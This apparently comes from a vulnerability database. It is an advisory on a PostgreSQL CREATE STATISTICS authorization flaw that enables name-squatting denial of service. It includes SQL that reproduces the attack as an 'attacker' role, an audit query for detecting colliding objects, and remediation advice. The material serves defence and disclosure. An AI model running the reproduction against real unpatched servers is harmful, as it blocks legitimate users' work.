PostgreSQL Missing Authorization Vulnerability in CREATE STATISTICS Command Leading to Denial-of-Service

Vulnerability

A denial-of-service vulnerability has been identified in PostgreSQL versions prior to 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23. The CREATE STATISTICS command did not check that the executing user holds CREATE privilege on the schema named for the new statistics object; it only required ownership of the table the statistics are built on. A table owner could therefore place an extended statistics object in any schema, including schemas in which they are otherwise not permitted to create objects. When a user who does hold CREATE privilege on that schema later runs CREATE STATISTICS with the same object name, the command fails with a duplicate-object error.
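The following is an added example, not part of the advisory: it reproduces the precondition on an unpatched server (a table owner creating a statistics object in a schema where they lack CREATE) and then shows an audit query that lists statistics objects whose owner does not hold CREATE on the containing schema. The role, schema, table and object names (victim, attacker, app, scratch, t, orders, s1) are constructed for illustration.

```sql
-- Added example (not from the advisory). Role, schema and object names
-- (victim, attacker, app, scratch, t, orders, s1) are constructed.

-- Setup, run as a superuser: "attacker" owns a table in its own schema but
-- holds only USAGE on schema "app" (no CREATE privilege there).
CREATE ROLE victim   LOGIN;
CREATE ROLE attacker LOGIN;
CREATE SCHEMA app     AUTHORIZATION victim;
CREATE SCHEMA scratch AUTHORIZATION attacker;
GRANT USAGE ON SCHEMA app TO attacker;

-- Attacker: CREATE STATISTICS verifies ownership of the source table, but
-- unpatched servers did not verify CREATE on the target schema, so this
-- succeeds even though attacker cannot CREATE TABLE in "app".
SET ROLE attacker;
CREATE TABLE scratch.t (a int, b int);
CREATE STATISTICS app.s1 ON a, b FROM scratch.t;
RESET ROLE;

-- Victim owns "app" and therefore legitimately holds CREATE on it, yet the
-- object name is already taken.
SET ROLE victim;
CREATE TABLE app.orders (customer_id int, region text);
CREATE STATISTICS app.s1 (dependencies) ON customer_id, region FROM app.orders;
-- unpatched: ERROR:  statistics object "s1" already exists (SQLSTATE 42710)
-- patched:   never reached; the attacker's CREATE STATISTICS above already
--            failed with ERROR:  permission denied for schema app
RESET ROLE;

-- Audit: statistics objects whose owner lacks CREATE on the schema they
-- live in. On a patched server such rows can only arise from privileges
-- revoked after creation; on an unpatched server they are candidates for
-- DROP STATISTICS (by a superuser or the object's owner).
SELECT n.nspname                   AS schema,
       s.stxname                   AS statistics_object,
       pg_get_userbyid(s.stxowner) AS owner,
       c.relname                   AS source_table
FROM   pg_statistic_ext s
JOIN   pg_namespace n ON n.oid = s.stxnamespace
JOIN   pg_class     c ON c.oid = s.stxrelid
WHERE  NOT has_schema_privilege(s.stxowner, s.stxnamespace, 'CREATE');
```

On a patched server the script stops at the attacker's CREATE STATISTICS, which is the behaviour the fix introduces; the audit query is useful either way, since it surfaces objects created before the upgrade. Rows it returns are a heuristic, not proof of abuse: an owner whose CREATE privilege was revoked after they created the object legitimately will appear too.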

Impact

Exploitation of this vulnerability causes a denial-of-service condition for users attempting to create statistics: their CREATE STATISTICS fails if a table owner has already taken the same name in that schema, and the intended object cannot be created until the colliding one is dropped or a different name is chosen. The attacker's statistics object refers to the attacker's own table, so it does not alter query planning for other users' tables, and no data is disclosed or modified. Remediation is to upgrade to a fixed version; until then a superuser (or the object's owner) can remove a colliding object with DROP STATISTICS.

Added: Nov 13, 2025, 1:19 PM
Updated: Nov 13, 2025, 1:19 PM

Vulnerability Rating

Custom Algorithm
spread: 8.1
impact: 2.5
exploitability: 4.9
remediation: 7.7
relevance: 1.0
threat: 0.0
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.